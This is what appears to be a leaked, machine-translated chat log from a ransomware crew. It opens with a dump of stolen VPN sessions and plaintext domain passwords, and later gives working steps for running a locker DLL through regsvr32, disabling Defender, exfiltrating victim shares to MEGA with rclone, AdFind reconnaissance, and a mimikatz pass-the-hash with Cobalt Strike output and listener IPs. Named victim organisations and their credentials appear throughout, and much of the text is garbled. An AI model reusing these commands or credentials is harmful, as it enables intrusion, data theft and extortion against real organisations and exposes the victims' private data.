userName: ncseresznye Password: Welcome123$ Domain: GIC.Local [+] Found: SessionID: mWusU4dFejfPKNb5D1WJ6toR97y1yG41M9kBcjXNhcs= userType: 1 userName: hkoenig Password: Welcome123$ Domain: GIC.Local [+] Found: SessionID: q1RmZkd1esnMrzVra3RRMkznBL0JMpyRyQS1mcxMm5Y= userType: 1 userName: fquieti Password: cheryl3272 Domain: GIC.Local [+] Found: SessionID: qW11OtThcdntTddSEI7g0d01sQm4fkPqp9kTrdoXgoQ= userType: 1 userName: tbowen Password: Hadley123 Domain: GIC.Local [+] Found: SessionID: rbpQCm9CTSAEWhJfgXfFk6qwCoiYQVW79wyldz7yC6Y= userType: 1 userName: kthibodeaux Password: benjamin01 Domain: GIC.Local [+] Found: SessionID: uzjxsaL7Y1Aildxvh3De1ZnxfGlpgg0MzfUyUye19YA= userType: 1 userName: pbinkley Password: madison2001 Domain: GIC.Local [+] Found: SessionID: vmuFiC3uYrByDgZjIqaUR1xskukOGZJP1ChbVp2xF2Y= userType: 1 userName: cridenour Password: R!denour1 Domain: GIC.Local [+] Found: SessionID: ydcQvPYrdE7LrcCOXC97C0J1ClmYW321Q1v2ou9Q20VU= userType: 1 userName: jcoleman Password: rosebud4898 Domain: GIC.Local [+] Done with https://69.84.159.94, found 35 sessions 35 [+] Saving session data [+] Trying session 0agye8ssdBaNcrk6Zl0WqVCxdNYplgJ5gBlRAMhUlEA= [+] Saving config to ./Dumps/69.84.159.94/config.sqlite [==================================================] [+] AD creds administrator:G3n3r@l1$@172.22.9.3 ``` ``Additional feature added to the option to run the locker, which removes some of the AV detects when dropping it on the disk Startup via regsvr32 ``` regsvr32.exe /s locker.dll - without arguments regsvr32.exe /s /n /i: "here arguments" - with arguments ``` This update has brought a need to change the entry point, so all builds, which were issued before February 8 with the new fresh versions of BOOFs will NOT work! 
please when preparing new cases to take the NEW builds with the NEW BOOF files injector@all download and scrdate there is such a toolzagle pg adminsxxxxx no tips) who can tell me what would work in msf utility msf5 > db_nmap to scan the ports what and how to raise the need in ipso in Ubuntu? right now on startup it gives out ``[-] Database not connected ``` i need to raise the base on postgres type - who can tell me commands to run postgres and create a base, what would this machine work)?Air:metal:I am also glad to be with you)glad to see you in our circles:metal:hh:v:hhy spunoktam there are instructions and vidosat for starters read the branch of Generalstevan tell me how to start well acquainted with the guys so farshetope will soon be setsroon servers you orderedreetreetreet @sroonreet all hi I am new to you 30minutilizov. Grid is there bro ?all hello okay hey hey guys I will be in 3-4 hours fully I have reinstalledscould try to reboothhhz what is it too here @steven even can not connect all hellohey hey bro:joy:at least one here hello )how are you doing? 
hope all the fire all hey bandat.e connection to the cob on the domain?the route is when the cobalt is bolted to the domaing let's see i step back an hour and a halfaha, looking for shahrabrad let's see passa hi hi all hi banda hi , what is the route , i think i have without , since i work as of originally given a simple ip vps server , i certainly do not directly cling to it .., but still explain about plokladki plz) gentlemen, who have servers without gaskets - please write down the name)) dataevolution directly necessary104.243.46.74 443mne too netz plz 104.149.168.199 443)) steven now coming) with what to work there is (steven sitting idle since yesterday:zany_face:hello hello:smiling_imp:hello gangFurymario:joy:llovely bros/beacon_https/reverse_https 142.202.205.88 443 142.202.205.20588i listenerenerenerenergyafterwards I'm going to workoutafterwards guys who are online all crossed fingers:smiling_imp:hello there is ok guys:metal: how is this week going to go? hello! I want to finish my workoutafterwards we will pick something up hello hello Steve, what do I have to do? I downloaded the files, but we'll get into prodhai sonar:metal:helloBrendon:metal:kkprivetag altera wait for the week was not ace all hello gangZdhai brendon will work today ?i can't find anything i like so i just got here and i don't know if it's okay we will think about it today so i will do it now tell me what's going on at work today. 
On any resource can I rent and raise ?((we are waiting for the guys tomorrow progruzhey be online in 30 minutes will give networks:D:laughing: :joy: :joy:well leave them on the bottles of whiskey from their money when they pay ) :joy:do not forget about the tips :-D handsome guys be online guys I still very busy zdarovarov:v: hi hi guys:metal:kkya aftk for 20 minutes guys bots I'm waiting now sent to progroukkk5 minya tutochkiha smoke pendohal bye++++++ guys who are in the studio opisheeshas all the tasks yes, wanted to dig, or what to do if memory serves you there on your own car admintak there we were caught in the kerd, or what to do?)Hi, I will do a lot of pointers so guys who do what to do hello broooooooooooooooooooo we are all waiting for the curators then)I hate Mon finally solved all the cases with a pity) Mon is a hard dayhome someone showed up hello brooprivetau:rolling_eyes:taak, and where is the dispplina? i hope the beginning of a new week will be productive.secdaily ?or generate you a couple zakrepov ? aha Brandon if anything jump to winlogon if you come updo tomorrowokbuduemo for today offkya in placeokkya afk for 1-2 hours and will be up until morning in us seekkakoya there antivirus, etc all be prepared to lock today kamupus go to prodPriyat ecampus.com. got the info, what to do next. systemtechnologyinc.com Gatherinfiku who and where zatupy so let's go through the networks all hello sopunovoy will give today will be taught it is the very start search for servers through the domain controller, collecting information on AD: users, computers, groups search and sorting users, ipis, search sharsborov it what?i got it, i can't find it @all i need two builds with nix version and eshi - the last oneokay I'll do something now you without tasks? 2 more in the process of negotiating what the fuck is the news from k12 all hello, what news? 
ok, wait for tomorrow, it will be good
guys, when should we expect work?
and something else I do not remember
all wait for networks, with 2 sessions
also the scammers call from Sber, they say let's toss it
the k12 talks, do not piss, wait for the loading
loading, loading
wait for work?
hello, is there no work yet?
guys, any idea when it will end?
wait for the loading
steve, will there be work today?
hello, yes, will there be work today?
hello, hello everybody, hi!
tomorrow either vpn or session, I think the networks will be tomorrow
tomorrow, guys, the loading is in progress; as soon as something comes up I'll message
wait, silence again?
hello, will watch
hello, hello, will there be anything today?
hello everybody!
thanks
just or with Stas, it should work
manson, thank you!
Samuel, send me the batch file, if it's not a problem)
hello. can you try to disable it with the batch file? is it realistic to do without PowerShell and without RDP? guys, who has disabled Windows Defender through cmd (shell) on a remote machine?
openvpn with killswitch > nordvpn, privatemyaccess
I've seen a couple more of these on some public providers. Who has set up a Kill Switch + OpenVPN?
with docx you need to unpack it, and then put it back in place
portable python, roll it out
I have never... linbla, it linbla should be put + SharpChrome / Firefox passwords
A highly recommend ))))) or rather, not recommend it
Recommend if possible
all NTDS, 200 lines decrypted. I often got passwords from chrome + ntds.
literally on the CPU for a few seconds).atdushiHash the curator and he will give the decrypt to http://null-byte.wonderhowto.com/how-to/crack-password-protected-microsoft-office-files-including-word-docs-excel-spreadsheets-0193959/cookie this, .docx is password-protected, anyone know how to open ?only in msfv kob it does not knock the password string last `shell net user admin /domain ``How can I see in the cob when the username has changed the password ?white hello, I do not have any notifications, keep the sound down and fire angry with the fact that really when there is a controversy, half the screen is flooded with notifications if you know everything, well done, we are newbies and we need all these discussions in order to learn and become better:smiling_imp:red why angry then, turn off the sound thentut and it should discuss itmasters conspiracy, give theories about SORM, etc. in private) and so constantly knock messages did not hear about it how?only after vpn\soxy I never connect directly to the torus here config, I think you'll understand what to change) ``` #!/bin/bash /sbin/iptables -F && \ /sbin/iptables -F -t nat && \ /sbin/iptables -X && \ /sbin/iptables -P INPUT ACCEPT && \ /sbin/iptables -P FORWARD ACCEPT && \ /sbin/iptables -P OUTPUT ACCEPT && \ /sbin/iptables-save > /dev/null /sbin/iptables -P OUTPUT DROP /sbin/iptables -A INPUT -i lo -j ACCEPT /sbin/iptables -A INPUT -m state --state ESTABLISHED, RELATED -j ACCEPT /sbin/iptables -A OUTPUT -o lo -j ACCEPT # ip ot podpiski 183.30.41.59 our = 83.193.11:210 /sbin/iptables -A OUTPUT -o eth0 -d 83.193.11:210 -j ACCEPT /sbin/iptables -A OUTPUT -o wlp3s0 -d 83.193.11:210 -j ACCEPT /sbin/iptables -A OUTPUT -o tun0 -j ACCEPT /sbin/iptables -A OUTPUT -m state --state ESTABLISHED, RELATED -j ACCEPT ```[joy]``not unloads but relaxes[ ](https://stylebrooks.com/group/general?msg=4c2HNDbifNHby5q9P) well, you be careful with that kind of question :)who how relaxes himself guys:joy:happy to know who's having fun 
dunhill blue:smiling_imp:test *okay, the test passed) i don't smoke them again cones ? alex, rosette, ragnarok, mansonya work to smoke, who with me:grin:+++the topic is relevant to all) idle guys, and the time is 1 a.m. - no work? :) we're poor people, we live in rentals, drive tazas, wear clothes from the chinese:zany_face:guess =)))))))again, only when you have money, the motherland finds reasons to squeeze))) fuck, who the hacker here who has the new gelendagen on the districthuminescents change modemswas much easier to figure out will not sim and on the device, and not all devices change imai, so you better immediately and modem / router changejoy:that's true, I do not know why we should be interesting here =) we're doing our best for our country!i would have to take a router with a SIM card and also change the username when switching SIM cards, would that be ok?you with a smirk said with a smirk) change of SIM card will not do anything unless you have different phones, and you use only trolley and all through VPN, it's better to change the modem once a month? i have not been approached) and the change of SIM card once a month does not work +[ ](https://stylebrooks.com/group/general?msg=6CbYQvhqTuGpaNvQb) no sense to change the location if you carry a mobile with you, imai devices mobile + imai modem will all the time nearrazetka and you knocked in the masks already?))) but shhh :) to the kitchen once an hour gde) workplace, or poh? 
guys tell me how often you change location?supports ðrnache to the adapter vpna virtual can mount) as altertaiva khuniksu virtual router pfsens very convenient to manage traffic virtualokda normal theme, checha) the main thing ipiteibls config saveeda, normal theme with scriptotam through iptables done if someone needs to give the script can bash, You can change it by your hands and you will have a ready to use config to let the traffic through 1 ipi, select your input VPN as ipi, and the traffic goes through it only, if your VPN goes down, the traffic will not go past it. Norm theme. put isikoroch zaroutat traffic through the root in the vpn what killsvitchet same is simply a couple of nodes add and change from time to time, che =) worked off a couple of grids - change.not that snifet, and the logs are like the central routers remain what your VPN and the difference in security from the public[ ](https://stylebrooks.com/group/general?msg=L43qA8SHeW6DkKTy) convenient?) skidyl, but I'm like that all my own doing it all hz) alter gril that you can protect against dropping traffic literally there 4-5 strings vaktya like ssh gave, setapni, pochekal - all ok) no instructions. contact can share admin local setapil. protection against dropping trafficnalogue for VPN. ahaasvoivpn own? 
a separate laptop on the laptop only the virtualizer and the hoonix analogue then for each thing a different route + - in the end, it is kind of like a dedicated server to take, put the virtualization + encrypted boot sector crypto, the key for the decryption is stored somewhere in the memory, then it can be dumped as a result there do wpsvatschete if ok then just advise services or countries without logs does not happen =) without logs and bs bitmomething not to store anything on their virtualkuPlease advise services vsdushki in the wind also utilitiesdisk party is linuxmuzhiki i can't find it, i can't use it, i can't find it in the list of processes, i don't know what to do, i can't send commands to it, and i don't understand it, i can't use it in the list of processes, i can also try to break into a folder i put a token yes, october file browser, try to break into a server, sometimes i put a token on, it says that the system, but in fact the token is on, how to make sure that the token is put on? say, if I sit under the system:thumbsup:agreehttp://www.zerodayinitiative.com/advisories/published/ speaking of zero day vulnerabilities, a good resourcehttp://www.secura.com/blog/zero-logonновая hole in the asset directoryDo it on dk? after that everywhere def knocked out. 
much more convenient batiko+` ``gpupdate /force ``-------To knock out the defender via the GPO https://www.prajwaldesai.com/how-to-turn-off-windows-defender-using-group-policy/+all traffic is encrypted, no detecting and we can ping, snoop, roam, throw port to the outside of the LAN =) the diap what to do and what to put there (1 command is ideal) so in short I think you can even localize through this ccj + you can roam on computers in search of files upload ccj client no problem with handsrms, well, run it out and make it simple =) ------------------Kill defender in bulk ``https://www.prajwaldesai.com/how-to-turn-off-windows-defender-using-group-policy/ ``https://spy-soft.net/vpn-tunnel-windows-linux/ this guy's manualVPN tunnel over SSH (L2/L3 tunnels)``https://xakep.ru/2020/09/08/windows-pivoting/ ``Guys, any networkers? VPN over SSH can someone collect up to 1 command? very cool will help everyone ... if the archive is pulling too much traffic? here yes, well, as an alternative, you can split into separate archives, I downloaded the archive of 2gb, everything went fine this archive with a bunch of dllos, fill it then ekstractym in the folder mg, here do not load so download from the link: https://mega.nz/file/G4wzjYxI#oVtJtRACPNiQEMLYaqa88Fx7UzqSbEAlv0dULAYo6gg--- If you need to download many heavy files from the ball, it will take a long time to pull them through coba, you can unzip them to mega using megacmd, --- Pre-archiving files into zip ``` MegaNZ usage 1) Create folder for files 2) Uploads exe and dll files to created folder 3) Start background MEGAcmdServer.exe 4) Use the commands: > MEGAclient.exe update --auto=off # disable autoupdate for megacmd > MEGAclient.exe login login password # init session by creds > MEGAclient.exe # check connection > MEGAclient.exe put -q --ignore-quota-warn test.txt # upload file to acc storage [-q background process] > MEGAclient.exe ls # check remote directory > MEGAclient.exe logout # end session > MEGAclient.exe quit # 
kill MEGAcmdServer.exe 5) Remove special folder for MEGAcmd. 6) Remove update task from schtasks: > schtasks /query /FO list | findstr /i "mega" > SCHTASKS /TN "\mega\ FULL NAME HERE" /DELETE /F example: > MEGAclient.exe update --auto=off Automatic updates disabled > MEGAclient.exe login supertest@mail.test P@$$w0rd log in > MEGAclient.exe whoami Account e-mail: supertest@mail.test, check our account > MEGAclient.exe put -q --ignore-quota-warn C:\temp\test.txt upload test.txt > MEGAclient.exe ls test.txt, check what files already uploaded > MEGAclient.exe logout Logging out... > MEGAclient.exe quit close megaclient > schtasks /query /FO list | findstr /i "mega" Folder: \MEGA TaskName: \MEGA\MEGAcmd Update Task S-1-5-10-1145623454-6237456245-1243533621-3000 > SCHTASKS /TN "\MEGA\MEGAcmd Update Task S-1-5-10-1145623454-6237456245-1243533621-3000" /DELETE /F Then you can also check with tasklist, and use taskkil to kill the mega process ``YeahYeah, right! Not always the truth these accounts RDP is included, but in our cases while digging - it works quite well)@addition, always have to climb service acom, much less % under it will climb to this service, acom respectively not SQLLLXXXXADMIN) and the team installadmin, winadmin and so on ------------------- If you really need RDP in the lock :: HOW NOT to LOSE :: 1. Choose a server OS , ping, found. Do a dir listing ``ls \\\\\REMOTE-HOSTNAME\C$\Users``. Sorting by Modified. Where there is a fresh touch - under these users definitely DO NOT log in because it's easy to get the following situation - you came in, downloading balls/testing something and suddenly this user logs in to this pc and sees your results... Detect. Cleaning. End game. To do this, select a polzak who on this server went last year, say. I think the mechanics of it is clear? 2. Select polzak from YES, which hangs in YES, but almost never used ``hell net group "Domain Admins" /domain``. This is a list of our licenses. 
Next, we skim the user information one by one ``hell net user Administrator /domain Look for Last Logon line - i.e. last time he logged on the network (on any of the PCs in the network) If there is a date like the month before last month, half a year or even a year - great. That's what we need. Most likely it is either a service account or admin they do not go and you on the RDP, he certainly does not bother. These are simple tricks that will help you not to get caught on the RDP 3. Do not linger on RDP, after you have finished - do Logoff (MUST). Not to be confused with just closing RDP window. =):ok_hand: )friends, I'm very busy, today I will be a little later than usualHow to decrypt the real one, looks like HEX but no wayMicrosoft_WinInet_192.168.0.10:80/** 65490 *\backup 01 00 00 00 d0 8c 9d df 01 15 d1 11 8c 7a 00 c0 4f c2 97 eb 01 00 00 00 00 c7 71 71 3d cf 77 84 c6 43 9c 78 9f b3 75 8c e6 be 00 00 00 00 18 00 00 00 57 00 49 00 4e 00 49 00 4e 00 45 00 54 00 43 00 72 00 65 00 64 00 00 00 03 66 00 00 c0 00 00 00 10 00 00 00 2c f7 67 9b f6 85 ad 39 97 e0 40 3a 36 7e 45 99 00 00 00 00 04 80 00 00 a0 00 00 10 00 00 00 67 22 c8 7b 4e f1 2b 80 59 3e 1d 02 f9 bc 0c e6 20 00 00 00 00 bc 0a c5 ab 6e 3a a7 05 8b 5a ce 75 2b b9 9d 63 c8 78 ac 4b 04 8e e5 cc 8a 4a 4a fc 0f ac 3a 5e 54 14 00 00 00 ba b6 a2 32 76 da 02 73 a7 60 f1 7f 93 c6 78 6a 82 32 26de does anyone know what this is from mimicry? 
MSIX-Skype for Desktop/live:dudurech90_1\live:dudurech90_1 7b 22 72 61 77 54 6f 6b 65 6e 22 3a 22 65 79 4a 68 62 47 63 69 4f 69 4a 53 55 7a 49 31 4e 69 49 73 49 6d 74 70 5a 43 49 36 49 6a 45 77 4d 69 49 73 49 6e 52 35 63 43 49 36 49 6b 70 58 56 43 4a 39 2e 65 79 4a 70 59 58 51 69 4f 6a 45 32 4d 44 6b 77 4e 6a 63 34 4d 6a 59 73 49 6d 56 34 63 43 49 36 4d 54 59 77 4f 54 45 31 4e 44 49 79 4e 53 77 69 63 32 74 35 63 47 56 70 5a 43 49 36 49 6d 78 70 64 6d 55 36 5a 48 56 6b 64 58 4a 6c 59 32 67 35 4d 46 38 78 49 69 77 69 63 32 4e 77 49 6a 6f 35 4e 54 59 73 49 6d 4e 7a 61 53 49 36 49 6a 45 32 4d 44 6b 77 4e 6a 63 34 4d 6a 55 69 4c 43 4a 6a 61 57 51 69 4f 69 49 7a 5a 47 55 79 4f 47 51 35 4f 44 63 7a 4d 54 4d 78 59 6d 55 31 49 69 77 69 59 57 46 30 49 6a 6f 78 4e 6a 41 32 4f 54 4d 79 4d 44 49 35 66 51 2e 52 71 53 75 7a 74 32 77 51 65 4a 79 4d 51 69 5f 78 68 6e 62 79 68 47 35 62 59 38 30 66 6b 4b 58 67 7a 42 68 54 79 73 64 42 66 68 30 5a 34 32 66 48 57 4a 4c 57 58 6d 76 65 54 4d 5f 67 48 32 58 42 4f 4a 61 6c 32 6d 76 46 34 71 61 67 55 76 57 46 70 42 31 2d 61 65 6f 63 4b 2d 49 66 58 34 41 4b 70 4c 54 5a 43 30 73 37 4d 48 32 52 30 73 44 49 78 6c 4b 4c 6e 33 68 77 34 57 46 7a 56 74 4d 4b 70 55 67 47 58 69 37 65 53 55 50 65 37 39 44 53 65 59 52 55 7a 37 46 59 49 41 68 36 4d 71 75 6c 6f 41 5f 37 4f 6c 76 4b 66 6b 6a 46 69 39 55 49 32 30 45 6c 67 70 32 59 6e 6a 4d 71 37 52 72 63 54 49 76 4d 51 68 6e 79 33 70 32 6b 51 46 6a 6e 6e 78 4d 30 68 4a 75 6e 79 66 53 6d 69 38 33 63 38 46 52 4a 31 37 6b 4f 42 53 6b 2d 69 62 63 34 36 47 30 79 71 37 59 4b 76 79 74 6e 62 56 31 4f 74 42 4e 4c 41 54 4d 63 75 4d 48 59 48 68 5a 6d 74 44 39 4c 68 42 4a 61 50 6b 6e 4a 4f 6a 34 61 44 53 58 55 69 72 79 47 58 34 67 32 2d 68 46 5a 4c 4c 31 31 6f 44 67 76 77 41 36 69 50 67 4e 67 53 53 52 37 75 30 42 47 64 45 4f 72 47 71 4a 66 70 32 51 22 2c 22 65 78 70 69 72 61 74 69 6f 6e 22 3a 31 36 30 39 31 35 34 31 31 37 30 34 33 7d 00 00 00 00 00 can you extract the account from the sloud acronis agent?hi, if someone 
has difficulties with the lifting of the session through the rdp can try to drop me a line. so far only where there is rdp11 if memory serves zhava need try to put a normal password on the archive and change the file format, so it is not lit as an archive is not network technically can not except to archive directly on the host where the logical drive is partitionedparni, is there any way not to spam network traffic when you make archives with the ball? it's like one and the same, but they fuckin' spam the traffic, and in good corporations you can't make big archives for uploading. how to dump the base on a local server? who has faced with bases in azuer? chrome sees it, but writes about the certificate, the problem with the sonic does not see it through firefox, but through Edge does, I do not understand why...Hi, everybody. Please advise plz according to the manual SonicWall Open incognito browser and open the console (i.e. the blank page initially, or should I go into sonic and enter the credentials?) 2. Encoding...(enter into console (>> btoa ("47ZjFKx24Nj2h2UtZKX2OYnZLgRg05aX2SuaotVzrQg=") [ENTER] "NDdaakZLeDI0TmoyaDBVdFpLWDWDJPWW5aTGdSZZA1YVgyU3Vhb3RWenJRZz0=") with the replacement of the session and all?)@all Friends, the amount of shared experience exceeds the normal and structured storage, it was decided to raise a simple forum engine to publish there relevant guides and materials that we all have in the process. A big request to everyone! At your leisure time - write to me to register, and after her - write there on the articles of some, on the subject of the LJ to decide who can what. This forum will not be used as a chat-room, more as a storage and replenishment of the knowledge base, it will be useful to all, I have tried to divide the navigation of the topics and the approximate titles of the first articles outlined where we will port the material. 
Take responsibility, you have no idea how many questions of the same type are asked of each other here every day! We can save a lot of time for ourselves and our colleagues! https://prnt.sc/yz4t49с March 3, he writes 55 backups every timehttp://prnt.sc/yz4fgi this shit goes to the cloud? they also seem to be able to restore within 30 days no? should i look for an account or give up? @all who needs to rescan sonics - write within the hour to the relevant chatsIf the corp. google restores the deletion lust 30 days it's like if you take down gdrive, then all with endsIn my case i have a synology nas, it has claud sync to google drive, what options for deletion ? and does google restore deleted drive files ? @all can someone pass the session from the x64 car ? @all friends who are there free and without tasks, beep in PM I bet)toulouse by the way handy))) and not cna at all, does not integrate directly with the coba is it a script ?) https://docs.microsoft.com/en-us/sysinternals/downloads/psexec you mean this script?)hello everyone, who knows a cna script with these arguments? >psexec [hostname] [share] [listener]@all write to anyone who needs a session to redo, right in the workplace on this case where you need freshThe question as above advised through ftp server on the dedicec, filezilla put 5 minutes, then through the clone pull, very surprised speed, 46 gb for an hour and a half did[ ] (https://stylebrooks.com/group/general?msg=5KZsucuYmrv24D8TX) found a version of this. if relevant scribble 5-10mbps really. 
onyon back repurposed kekhoroshy analogue) I just rented a server at 32tb and there I download by ftpstalked that the case is limited to the use of mega, are there any other good analogues, preferably with btk payment ?yes, it will take some time to weigh all the same, won't it ?well thank you and that's it) you can somehow use wmik, the syntax would be correct da well, it's too long...see in the last line of the outaptu ``dir /s E:\YouDocs > log.txt ``How do I check the size of a certain folder? dnscmd /enumzones > AllZones.txt for /f %a in (AllZones.txt) do dnscmd /ZoneExport %a %a.txt ` `remember plyz command polling DNS with DC@all who needs 2fa re-transcribe to sonics? now really do if the log will not be then try the user to write it, from whom you start vmikflag -P plug in and add at the end >> C:\stat.logI was just interested in the statistics. In any case, thank you.@lexman wait, but it's just start and check, without the ability to periodically see the statistics of the upload, as with the flag `-P`, right? I will add, before starting check that the system rights on the remote machine was enough to go to a given diRight, thanks. The variant with wmic is also interesting, @lexmandaThe whole output will go into session, yes? `shell rclone.exe copy "\\host\F$" mega:/ -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12 -P `all output into session. flag `-P `you use and all or ` --progress `Thanks! Yes I will explain in detail, please, or give example? Perhaps others will also be useful.rklon command put in the baton, run through wmic it worksGentlemen, is there any way to run rclone from bacon, and then periodically check the progress? https://www1.appliedsystems.com/en-us/resources/videos/applied-csr24/https://portal.csr24.com/ - has anyone come across? stewart can fill a bunch at once a free service for cracking hasheshttp://crackstation.net/sends backups to the cloud, in the account is a pass, but is there an option to get it? 
as in viamStorageCraft who decrypted the cracks? SHUT UP AND TAKE ME FULL INFO!111 and 50 rows by 50 rows to query the tablesto watch the database then dump the clere pass will query all the msl servakina based noSpaaahohoro we need the combine to pump up not the fact that there is a webapp, or separately look for this webapp not clere dumps hashioni lie in clereveb the appa "writes" in the base in config[ ](https://stylebrooks.com/group/general?msg=eJuSrgKkk8W7Yumcy) hmmm well if it's on gitecac i've already said it's a tricky way to do it more options? yes, where is the target process on the DB server? where are the creeds? msf can dump sa creeds, i think there is a similar solution on the gitaskl management studio involves opening an rd on which you can palp cobalt session - to catch a detec-tionadoado the easiest and safest option that do not palnutsya usually these crosses are in the configuration of web applicationswant to pump the manual can and not only her pollingI ask why is it MsSql admin account is certainly she has a crosses or what is where as the account is where to get it?so stopsqlcmd under the VPN)hhm on a remote hosta from under the VPN saysqlcmd under the account saaWhat options for polling the database has except SQL Management Studio hoisting the session and the injection in sqlservr ?@all those without cases - in pm+@all attention everyone, who needs to reset the session SonicWall have to work with today directly - write to the PM thank you I will try it thank youhttp://habr.com/ru/post/441166/ https://www.ise.io/casestudies/password-manager-hacking/кто can do something with the 1Password database? 
foreach($line in Get-Content .\file.txt) { if($line -match $regex){ # Work here } } ``in the loop, for examplepowershell Get-WmiObject -Class win32_logicalDisk `-ComputerName IP ` | ft DeviceID, @{Name="Free Disk Space (GB)";e={$_.FreeSpace /1GB}}, @{Name="Total Disk Size (GB)";e={$_.Size /1GB}} -AutoSize Can someone tell me how to specify the ip address file correctly, so I don't have to type them separated by commas? tried : `(Get-Content C:\programdata\list.txt)` but it says it's wrong argument output: ``` #< CLIXML Get-WmiObject : Cannot validate argument on parameter 'ComputerName'. The argum_x000D__x000A_ent is null or empty. Provide an argument that is not null or empty, and then t_x000D__x000A_ry the command again._x000D__x000A_At line:1 char:54_x000D__x000A_+ Get-WmiObject -Class win32_logicaldisk -ComputerName (Get-Content c:\programd_x000D__x000A_ata ..._x000D__x000A_+ ~~~~~~~~~~~~~~~~~~~~~~~~_x000D__x000A_~~~_x000D__x000A_ + CategoryInfo : InvalidData: (:) [Get-WmiObject], ParameterBindi _x000D__x000A_ ngValidationException_x000D__x000A_ + FullyQualifiedErrorId : ParameterArgumentValidationError,Microsoft.Power _x000D__x000A_ Shell.Commands.GetWmiObjectCommand_x000D__x000A_ _x000D__x000A_ ``[ ](https://stylebrooks.com/group/general?msg=S6Z34gLYgcgAwB5Hx) anybody rolled ? 
let me play :)thxxm `` adfind.exe -b dc=domain,dc=local -f "(objectcategory=person)" > C:\Programdata\ad\domain\ad_users.txt adfind.exe -b dc=domain,dc=local -f "objectcategory=computer" > C:\Programdata\ad\domain\ad_computers.txt adfind.exe -b dc=domain,dc=local -f "(objectcategory=organizationalUnit)" > C:\Programdata\ad\domain\ad_ous.txt adfind.exe -b dc=domain,dc=local -subnets -f (objectCategory=subnet)> C:\Programdata\ad\domain\subnets.txt adfind.exe -b dc=domain,dc=local -f "(objectcategory=group)" > C:\Programdata\ad\domain\ad_group.txt adfind.exe -b dc=domain,dc=local -gcb -sc trustdmp > C:\Programdata\ad\domain\trustdmp.txt ``trustanddmp ``nltest /trusted_domains ``remember the command to poll the trustdmp ? without a crude can be? from yes to one@alter what is the manual to hunt and drag terrabytes! it's through the S3 repository implemented? o_unreal, alas, there's a battlefield here, who's rocket is cooler - and he wins, so we build rockets constantly)so it's not scary anymore)we have everything here and need constant support)through any channel of any software in theory, there are different ways to play in principle we have someone who writes put the tz - let's make a simplea it's perl-likehttp://github.com/RhinoSecurityLabs/external_c2_frameworkhttps://www.cobaltstrike.com/help-externalc2https://rhinosecuritylabs.com/aws/hiding-cloudcobalt-strike-beacon-c2-using-amazon-apis/не, you do not understand a little now show the detects well I still do not have time to figure it out - if you have the desire - better to dig in this direction then http://github.com/Und3rf10w/external_c2_framework like this, but if you are interested - cobalt has external c2 and tacda, a complete framework@all https://blog.dylan.codes/shad0w/ interesting enough "fresh" framework if you have time and interest - i recommend to poke around, but viola correctly hinted that you can put the client on the remote with the VPN just[ 
](https://stylebrooks.com/group/general?msg=H5q2v6pjgFTsWTMPQ) if you have crones, it's hard to answer, but i do not really understand why you need sox in this chain? why not open a VPN immediately with the right part?maybe there is some ssh access, where you can clean up with commands.i at least have not seen a two-factor on vmik or psehs try through wmiexec shell open and forti process put out if there Hyper-V by mikrosoft at least if you put out the hypervisor but you and all the virtuals it hosts will fall off, no? but let's know sansp. no time. admin put out the internets on it kerberos tickets for example can be requested to get rights to shared resources this hash machine for SPN you after pth should do stiltoken this process : ``` | PID 17844 | TID 8412 | LSA Process is now R/W ``` which runs under the token you hackypants well if it is a live machine acct should work ... you can also try through the laughs, also should work cme smb 127.0.0.1 -u TRUCAMTLBK4\$ -H c028fc26ba545c599adbb9b7e26964d1 -d trudeaucorp.como very defensible bekapseven in the brow here admin me worked 100% lm there whatev msf lm:ntlm suyumimik eats ntlm straight to kobena it is clear) lm:ntlmane?ntlm simpler sorta śhatakoy should be ntlmc028fc26ba545c599adbb9b7e26964d1:c028fc26ba545c599adbb9b7e26964d1msfom then all bypass everything try - /user:TRUCAMTLBK4\$.salt is what but I may not mimic the correct way `` beacon> mimikatz sekurlsa::pth /user:TRUCAMTLBK4$ /domain:trudeaucorp.com /ntlm:c028fc26ba545c599adbb9b7e26964d1 [*] Tasked beacon to run mimikatz's sekurlsa::pth /user:TRUCAMTLBK4$ /domain:trudeaucorp.com /ntlm:c028fc26ba545c599adbb9b7e26964d1 command [+] host called home, sent: 750703 bytes [+] received output: user : TRUCAMTLBK4$ domain : trudeaucorp.com program : cmd.exe impers. : no NTLM : c028fc26ba545c599adbb9b7e26964d1 | PID 17844 | TID 8412 | LSA Process is now R/W | LUID 1 ; 2572284471 (00000001:9951f237) \_ msv1_0 - data copy @ 000001CC19EF7DD0 : OK ! 
\kerberos - data copy @ 000001CC1A834828 \_ aes256_hmac -> null \_ aes128_hmac -> null \_ rc4_hmac_nt OK \_ rc4_hmac_old OK \_ rc4_md4 OK \_ rc4_hmac_nt_exp OK \_ rc4_hmac_old_exp OK \_ *Password replace @ 000001CC17DA3948 (32) -> null beacon> shell dir \\\TRUCAMTLBK4\c$ [*] Tasked beacon to run: dir \\\TRUCAMTLBK4\c$ [+] host called home, sent: 51 bytes [+] received output: You can't access this shared folder because your organization's security policies block unauthenticated guest access. These policies help protect your PC from unsafe or malicious devices on the network. ``And the ptx how? So give me the hash of the machine and the login in TRUCAMTLBK4\$ format, you can safely stick it into the msf. admin is very clever about hiding backups. urgentonasar have a domain need access to the machine will this work and how to get it right We'll have to dump all the hashes and try to authenticate with the machine hash Target is TRUCAMTLBK4 hash the output is ``9051 TRUCAMTLBK4$ c028fc26ba545c599adbb9b7e26964d1 528384 ``` how do you shoehorn a hash \ token to start a machine? command\session at least my@all issproduce.co.uk remind me who has a mesh in work small etaschas look at what their data on the deed will press possible if the bookmark is or can create it fuckin coding thank you understandChoose from the tune of the admin? different if there remot app you must have the servers configuredHello guys all! Hey guys, advise Sonic, from the browser can fall in the RDP without a VPN connection?[ ](https://stylebrooks.com/group/discussion?msg=WmcxwRiXwBd3iiNFN) #general[ ](https://stylebrooks.com/group/discussion?msg=GpNTAMdKuF2W7ZctF) hmm, timeweaver also supports it? interesting ... someone posted how then you can pull sessions from vpn sonic software, no tips where it is? did not work to install as admin. 
